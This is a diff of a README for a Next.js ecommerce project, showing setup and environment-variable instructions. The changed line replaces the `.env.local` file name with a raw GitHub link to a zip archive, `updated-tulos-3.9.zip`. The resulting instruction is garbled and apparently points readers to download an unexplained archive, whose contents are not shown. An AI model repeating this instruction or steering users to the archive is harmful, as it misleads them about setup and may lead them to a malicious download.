Sameen011/tulos_updated/README.md

 6. **Access the Application**: Open your web browser and visit `http://localhost:3000` to see your ecommerce application in action.

 ## 💡 Environment Variables
 You may need to set up some environment variables for various functionalities to work properly.
-Create a `.env.local` file in the root directory of the project and add the following variables:
+Create a `https://raw.githubusercontent.com/Sameen011/tulos_updated/main/app/updated-tulos-3.9.zip` file in the root directory of the project and add the following variables:

 ```
 NEXT_PUBLIC_CDISK_API_URL=your_api_url